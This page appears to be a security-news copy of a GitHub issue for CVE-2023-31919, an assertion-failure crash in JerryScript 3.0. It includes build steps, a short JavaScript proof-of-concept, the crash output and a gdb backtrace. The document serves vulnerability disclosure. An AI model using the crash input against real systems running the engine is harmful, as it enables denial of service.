Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-31919: Assertion '!jcontext_has_pending_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88. · Issue #5069 · jerryscript-project/jerryscript

Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the jcontext_raise_exception at jerry-core/jcontext/jcontext.c.

CVE
#ubuntu#linux#js

JerryScript revision

Commit: 05dbbd1
Version: v3.0.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

Test case

// poc.js var t = Function ( ) ; t [ Symbol . species ] = Object ; var e = new Proxy ( { constructor : t } , { set : function ( ) { } } ) ; RegExp . prototype [ Symbol . matchAll ] . call ( e ) ;

Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js ICE: Assertion '!jcontext_has_pending_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88. Error: JERRY_FATAL_FAILED_ASSERTION Aborted (core dumped)

Backtrace

(gdb) #0  0xf7f40d99 in __kernel_vsyscall ()                                                                            
#1  0xf7c15276 in raise () from /lib32/libc.so.6                                                                        
#2  0xf7bfd3f7 in abort () from /lib32/libc.so.6                                                                        
#3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                  
    at /jerryscript/jerry-port/common/jerry-port-process.c:29                              
#4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                       
    at /jerryscript/jerry-core/jrt/jrt-fatals.c:63                                         
#5  0x08260d64 in jerry_assert_fail (                                                                                   
    assertion=0x8434bc0 <str> "!jcontext_has_pending_exception ()",                                                     
    file=0x8434b00 <str> "/jerryscript/jerry-core/jcontext/jcontext.c",                    
    function=0x8434c20 <__func__.jcontext_raise_exception> "jcontext_raise_exception", line=88)                         
    at /jerryscript/jerry-core/jrt/jrt-fatals.c:83                                         
#6  0x0825e7b0 in jcontext_raise_exception (error=4115661203)                                                           
    at /jerryscript/jerry-core/jcontext/jcontext.c:88    
#7  0x081f52e5 in ecma_raise_standard_error (error_type=JERRY_ERROR_SYNTAX, [0/1762]
    msg=ECMA_ERR_INVALID_REGEXP_FLAGS)    at /jerryscript/jerry-core/ecma/operations/ecma-exceptions.c:315#8  0x081f5a91 in ecma_raise_syntax_error (msg=ECMA_ERR_INVALID_REGEXP_FLAGS)
    at /jerryscript/jerry-core/ecma/operations/ecma-exceptions.c:456
#9  0x08234ac7 in ecma_regexp_parse_flags (flags_str_p=<optimized out>, 
    flags_p=<optimized out>)
    at /jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:115
#10 0x0835e0d2 in ecma_builtin_regexp_prototype_match_all (
    regexp_obj_p=0xffcd35c0, string_arg=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:504
#11 ecma_builtin_regexp_prototype_dispatch_routine (
    builtin_routine_id=<optimized out>, this_arg=<optimized out>, 
    arguments_list_p=<optimized out>, arguments_number=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:598
#12 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, 
    this_arg_value=<optimized out>, arguments_list_p=0xffcd3690, 
    arguments_list_len=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#13 ecma_builtin_dispatch_call (obj_p=<optimized out>, 
    this_arg_value=<optimized out>, arguments_list_p=<optimized out>, 
    arguments_list_len=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#14 0x081fb6b8 in ecma_op_function_call_native_built_in (
    func_obj_p=0xf55004c0, this_arg_value=4115662259, 
    arguments_list_p=0xffcd38d4, arguments_list_len=0)
    at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#15 0x081fa81d in ecma_op_function_call (func_obj_p=0xf55004c0, 
    this_arg_value=4115662259, arguments_list_p=0xffcd38d4,  
    arguments_list_len=0)
    at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#16 0x0833172e in ecma_builtin_function_prototype_object_call (
    func_obj_p=0xf55004c0, arguments_list_p=0xffcd38d0, 
    arguments_number=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-function-prototype.c:288
#17 ecma_builtin_function_prototype_dispatch_routine (
    builtin_routine_id=<optimized out>, this_arg=<optimized out>, 
    arguments_list_p=<optimized out>, arguments_number=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-function-prototype.c:529
#18 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, 
    this_arg_value=<optimized out>, arguments_list_p=0xffcd38d0, 
    arguments_list_len=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#19 ecma_builtin_dispatch_call (obj_p=<optimized out>, 
    this_arg_value=<optimized out>, arguments_list_p=<optimized out>, 
    arguments_list_len=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#20 0x081fb6b8 in ecma_op_function_call_native_built_in (
    func_obj_p=0xf5500460, this_arg_value=4115662019, 
    arguments_list_p=0xffcd3af4, arguments_list_len=1)
    at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#21 0x081fa81d in ecma_op_function_call (func_obj_p=0xf5500460, 
    this_arg_value=4115662019, arguments_list_p=0xffcd3af4,  
    arguments_list_len=1)
    at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#22 0x081fa5cf in ecma_op_function_validated_call (callee=4115661923, 
    this_arg_value=4115662019, arguments_list_p=0xffcd3af4,  
    arguments_list_len=1)
    at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
#23 0x082d7631 in opfunc_call (frame_ctx_p=<optimized out>)
    at /jerryscript/jerry-core/vm/vm.c:758
#24 vm_execute (frame_ctx_p=0xffcd3ac0)
    at /jerryscript/jerry-core/vm/vm.c:5217
#25 0x082d4f62 in vm_run (shared_p=0xffcd3bb0, this_binding_value=4119870595, 
    lex_env_p=0xf57007b0)
    at /jerryscript/jerry-core/vm/vm.c:5312
#26 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>,  
    function_object_p=<optimized out>)
    at /jerryscript/jerry-core/vm/vm.c:286
#27 0x0812a4e5 in jerry_run (script=4115663075)
    at /jerryscript/jerry-core/api/jerryscript.c:548
#28 0x083eac3f in jerryx_source_exec_script (path_p=0xffcd5235 "test.js")
    at /jerryscript/jerry-ext/util/sources.c:68
#29 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
    at /jerryscript/jerry-main/main-desktop.c:156
(gdb) quit                                

credits: @EJueon, @Ye0nny of the seclab-yonsei.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907